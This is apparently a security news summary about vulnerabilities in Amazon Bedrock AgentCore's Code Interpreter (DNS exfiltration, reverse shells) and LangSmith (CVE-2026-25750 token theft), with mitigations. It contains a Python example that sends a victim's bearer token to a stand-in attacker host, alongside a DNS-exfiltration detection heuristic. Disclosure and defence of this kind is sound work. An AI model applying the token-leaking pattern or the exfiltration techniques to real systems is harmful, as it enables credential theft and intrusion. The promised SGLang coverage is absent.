
AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE

  • Mar 17

Key Findings


* Amazon Bedrock AgentCore Code Interpreter enables DNS-based data exfiltration and RCE
* LangSmith vulnerable to bearer-token theft via URL parameter injection (CVE-2026-25750)
* Sandbox mode in AI services can be exploited to bypass network isolation
* Potential for unauthorized data access and command execution across multiple platforms


Background


BeyondTrust cybersecurity researchers discovered critical vulnerabilities in AI execution environments that compromise network isolation and data security. The research highlights systemic weaknesses in how AI platforms manage sandboxed code execution and user authentication.


Amazon Bedrock Vulnerability


The core issue is that Amazon Bedrock's Code Interpreter allows outbound DNS queries despite a "no network access" configuration. Key attack vectors include:

* Establishing bidirectional communication channels over DNS
* Obtaining interactive reverse shells
* Exfiltrating sensitive information through DNS queries
* Executing commands by polling DNS A records


Researchers demonstrated that an overprivileged IAM role could grant broad access to AWS resources, substantially increasing potential damage.


LangSmith Token Theft Vulnerability


Miggo Security disclosed a high-severity flaw (CVE-2026-25750) characterized by:

* URL parameter injection via the baseUrl parameter
* Potential theft of user bearer tokens
* Compromise achievable through social engineering
* Impact on both cloud and self-hosted deployments
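
A minimal model of this class of injection: the client attaches its bearer token to whatever host the baseUrl parameter names. The function names, the request path, and the allowlisted host below are assumptions for illustration; this is not LangSmith's actual code.

```python
from urllib.parse import urlparse
import urllib.request

ALLOWED_HOSTS = {"api.smith.langchain.com"}  # assumed legitimate endpoint

def build_request(base_url: str, token: str) -> urllib.request.Request:
    """Vulnerable pattern: the bearer token travels to whatever host
    base_url points at, with no validation of that host."""
    req = urllib.request.Request(f"{base_url}/api/v1/runs")
    req.add_header("Authorization", f"Bearer {token}")
    return req

def is_trusted(base_url: str) -> bool:
    """Mitigation sketch: pin credentials to an allowlisted host
    before any request is built."""
    return urlparse(base_url).hostname in ALLOWED_HOSTS

# A crafted link supplies an attacker host as baseUrl; the token goes with it.
evil = build_request("https://collector.evil.example", "sk-victim-token")
```

The fix is structural rather than cosmetic: validate the destination host before attaching credentials, not after.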


Mitigation Recommendations


* Migrate critical workloads from sandbox mode to VPC mode
* Implement DNS firewalls
* Audit IAM role permissions
* Apply least-privilege principles
* Update to the latest platform versions
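
One way to operationalize the DNS-firewall recommendation is a resolver-side heuristic that flags query names whose leading label is unusually long or high-entropy, a common signature of data smuggled in DNS questions. The thresholds below (40 characters, 3.8 bits per character) are illustrative assumptions, not tuned values.

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy of a label's characters, in bits per character."""
    counts = Counter(label)
    total = len(label)
    return -sum(n / total * math.log2(n / total) for n in counts.values())

def looks_like_exfil(qname: str, max_len: int = 40, min_entropy: float = 3.8) -> bool:
    """Flag a query whose leftmost label is suspiciously long, or looks
    like encoded data rather than a human-chosen hostname."""
    first = qname.split(".", 1)[0]
    if len(first) > max_len:
        return True
    return len(first) > 12 and label_entropy(first) >= min_entropy
```

A heuristic like this complements, but does not replace, an allowlist-based DNS firewall: blocking resolution of unknown zones outright is the stronger control.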


Potential Impact


Successful exploitation could result in:

* Unauthorized data access
* Infrastructure compromise
* Sensitive information disclosure
* Remote code execution
* Service disruption


Conclusion


These vulnerabilities underscore the evolving security challenges in AI platforms and the need for rigorous security testing and continuous monitoring of emerging technologies.


Sources


  • https://thehackernews.com/2026/03/ai-flaws-in-amazon-bedrock-langsmith.html

  • https://www.socdefenders.ai/item/64c7c544-2272-44a9-8f9b-3a6501982332

  • https://x.com/shah_sheikh/status/2033962268841349510

  • https://x.com/shah_sheikh/status/2033961630304973055

  • https://www.facebook.com/thehackernews/photos/-amazon-bedrock-langsmith-and-sglang-flaws-expose-data-leaks-token-theft-and-rce/1319898513508062/


© 2025 by Explain IT Again
